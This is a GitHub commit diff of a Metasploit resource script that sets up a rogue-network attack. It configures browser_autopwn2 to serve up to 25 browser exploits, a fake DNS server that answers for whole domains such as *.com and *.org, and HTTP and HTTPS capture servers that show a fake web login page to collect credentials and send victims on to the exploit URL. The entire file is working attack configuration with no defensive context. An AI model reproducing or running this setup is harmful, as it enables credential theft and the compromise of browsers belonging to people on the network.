Some changes and updates

This commit is contained in:
Francesco Grotti
2016-12-19 15:15:31 +01:00
committed by GitHub
parent f3025eff42
commit 7f9850fe54

View File

@@ -1,17 +1,12 @@
use auxiliary/server/browser_autopwn2 use auxiliary/server/browser_autopwn2
set MAXEXPLOITCOUNT 30
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 80
set AUTOPWN_URI /
set MAXEXPLOITCOUNT 25
set HTML::base64 double_pad set HTML::base64 double_pad
set MaxSessionCount 20 set MaxSessionCount 20
set ShowExploitList true set ShowExploitList true
set LPORT 45000 set LPORT 45000
set SRVHOST 10.0.0.1 set SRVHOST 10.0.0.1
set SRVPORT 80 set SRVPORT 8081
set URIPATH / set URIPATH /try
run -j run -j
use auxiliary/server/fakedns use auxiliary/server/fakedns
@@ -31,3 +26,22 @@ set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu, *.fr
set TARGET ACTION BYPASS set TARGET ACTION BYPASS
set SRVPORT 53 set SRVPORT 53
run -j run -j
use auxiliary/server/capture/http
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 8081
set AUTOPWN_URI /try
set SRVHOST 10.0.0.1
set TEMPLATE weblogin/index.html
set SRVPORT 80
run -j
use auxiliary/server/capture/http
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 8081
set AUTOPWN_URI /try
set SRVHOST 10.0.0.1
set TEMPLATE weblogin/index.html
set SRVPORT 443
set SSL true
run -j